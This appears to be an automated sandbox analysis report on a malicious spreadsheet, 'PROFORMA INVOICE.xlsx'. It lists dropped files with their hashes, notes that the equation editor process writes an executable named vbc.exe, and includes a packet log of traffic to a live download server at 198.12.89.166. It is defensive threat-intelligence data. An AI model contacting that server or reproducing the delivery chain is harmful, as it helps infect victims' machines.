                                            MD5:46F08F94CD341EF8C7FBA87CBCE16DA9
                                            SHA1:9CFAA57A020F6B91F77BF33DFB601AA37E0C8BCA
                                            SHA-256:08A7E978FECF8831DA15E753F1BDE5AFA2C5E9E346AEA2D779025F125FECF54D
                                            SHA-512:CA273C0212C496649A36420342F519F36397A4682853EE763104175C0701F312BF7DA82C2FC688F45E7D8EDF977CF3CE9694FF1A94DFBAC24051599068BCC1D5
                                            Malicious:false
                                            Reputation:unknown
                                            Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                            Process:C:\Users\Public\vbc.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):731648
                                            Entropy (8bit):7.625561793309267
                                            Encrypted:false
                                            SSDEEP:12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
                                            MD5:F7ECD12D134AAF3541396C78337CE672
                                            SHA1:BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
                                            SHA-256:EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
                                            SHA-512:EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......*F.(........(.....**..(......*....(......*....(......*..{....*"..}....*&.(......*F.(........(.....**..(......*....(......*....(......*..0...........(.....o......o.....+..*.0...........(.....o......o.....+..*.0...........(.....o.......o.....+..*....0...........(.....o.......o.....+..*....0.. ........(.....o.......o......o$....+..*.0.. ........(.....o.......o......o$....+..*.(....o....*.(....o....*
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Reputation:unknown
                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):731648
                                            Entropy (8bit):7.625561793309267
                                            Encrypted:false
                                            SSDEEP:12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
                                            MD5:F7ECD12D134AAF3541396C78337CE672
                                            SHA1:BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
                                            SHA-256:EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
                                            SHA-512:EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Reputation:unknown
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......*F.(........(.....**..(......*....(......*....(......*..{....*"..}....*&.(......*F.(........(.....**..(......*....(......*....(......*..0...........(.....o......o.....+..*.0...........(.....o......o.....+..*.0...........(.....o.......o.....+..*....0...........(.....o.......o.....+..*....0.. ........(.....o.......o......o$....+..*.0.. ........(.....o.......o......o$....+..*.(....o....*.(....o....*
                                            File type:CDFV2 Encrypted
                                            Entropy (8bit):7.91695700296717
                                            TrID:
                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                            File name:PROFORMA INVOICE.xlsx
                                            File size:95744
                                            MD5:5b9ddbdf0a0af0788eeceeacec2f0295
                                            SHA1:77687d59abbd0b3c4eecc80abbe30d33a47e781c
                                            SHA256:e11f7d510b899e00e0cf10dc360400fd38f180e9c72f42c465c3a470075cd9ea
                                            SHA512:1657e35379aa82abe0edd01da1cf97cb6bbabcde9788c2e7b433f12df627320f29a519a502d71e66b39a40cd5dd908594c907cd69eacbceab797bfac6085ccf7
                                            SSDEEP:1536:c3ir/an65WHrmE9mfKMkBIvMBMVMO9C9SpX5xhhgD7uJbbi+7MgFlUveeAM:cSW68Lm/fKMk6tHCWToIXi+/nTF
                                            TLSH:A493E080781E8C1CD8EABA3CA3555E66BB14DF308D6F8070EFBE78C910B7856D9D5126
                                            File Content Preview:........................>......................................................................................................................................................................................................................................
                                            Icon Hash:e4e2aa8aa4b4bcb4
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 14, 2022 15:10:55.284567118 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.399624109 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.399729967 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.400794983 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518570900 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518635035 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518676043 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518706083 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518713951 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518743038 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518749952 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518757105 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518769026 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518815041 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518822908 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518857956 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518878937 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518902063 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518910885 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518944979 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.518949986 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518989086 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.518989086 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.519037008 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.589246035 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632600069 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632638931 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632666111 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632689953 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632719040 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632745981 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632770061 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632795095 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632812977 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632819891 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632848024 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632852077 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632853985 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632858038 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632880926 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632882118 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632894039 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632908106 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632936001 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632936001 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632949114 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632962942 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632986069 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.632987022 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.632997990 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633013010 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.633037090 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633038044 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.633047104 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633064985 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.633080959 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633090019 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.633116007 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.633116007 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633124113 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.633155107 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.637650013 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.746747971 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746808052 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746855021 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746886015 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746917963 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746943951 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746974945 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.746977091 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747009993 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747040033 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747040987 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747072935 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747104883 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747116089 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747131109 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747169018 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747172117 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747200012 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747217894 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747234106 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747261047 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747263908 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747291088 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747319937 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747334003 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747349977 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747380972 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747402906 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747409105 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747438908 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747457981 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747471094 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747503996 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747520924 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747533083 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747566938 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747586966 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747596025 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747625113 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747647047 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747656107 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747683048 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747701883 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747713089 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747742891 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747762918 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747792959 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747801065 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747828007 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747859955 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747874022 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.747889996 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.747927904 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.748013973 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.751224995 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.751272917 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.751323938 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.751362085 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.751394987 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.751470089 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.766722918 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861555099 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861594915 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861618996 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861640930 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861664057 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861686945 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861711025 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861736059 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861759901 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861767054 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861784935 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861797094 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861799955 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861810923 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861818075 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861836910 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861846924 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861864090 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861874104 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861890078 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861896992 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861912966 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861923933 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861937046 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.861947060 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.861972094 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.872720003 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880515099 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880661964 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880675077 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880721092 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880727053 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880754948 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880776882 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880778074 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880800962 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880800962 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880825996 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880837917 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880850077 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880856037 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880873919 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880876064 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880889893 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880899906 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880924940 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880927086 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880937099 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880950928 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880973101 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.880973101 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880985022 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.880996943 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881019115 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881025076 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881042957 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881063938 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881064892 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881072044 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881087065 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881089926 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881102085 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881114006 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881130934 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881135941 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881149054 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881159067 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881172895 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881182909 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881189108 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881206036 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881216049 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881227970 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881239891 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881251097 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881263018 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881273985 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881285906 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881299019 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881311893 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881324053 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881328106 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881346941 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881357908 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881371021 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881383896 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881393909 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881397963 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881418943 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.881431103 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.881457090 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.883136988 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975708008 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975775957 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975780010 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975815058 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975820065 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975857019 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975861073 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975898981 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975903034 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975939035 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975946903 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.975986004 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.975986958 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.976025105 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.976028919 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.976070881 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986705065 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.986809969 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.986829042 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986857891 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.986865997 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986901999 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986901999 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.986942053 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986943007 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.986983061 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.986983061 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.987025023 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.987025023 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.987065077 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.987066984 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.987112045 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.995810986 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.995884895 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.995893955 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.995925903 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.995943069 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.995984077 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.995999098 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.996042013 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997579098 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997663975 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997690916 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997710943 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997726917 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997770071 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997786999 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997827053 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997847080 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997888088 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997909069 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.997947931 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.997972012 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.998011112 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.998037100 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.998080969 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.998097897 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:55.998136044 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:55.998158932 CEST8049173198.12.89.166192.168.2.22
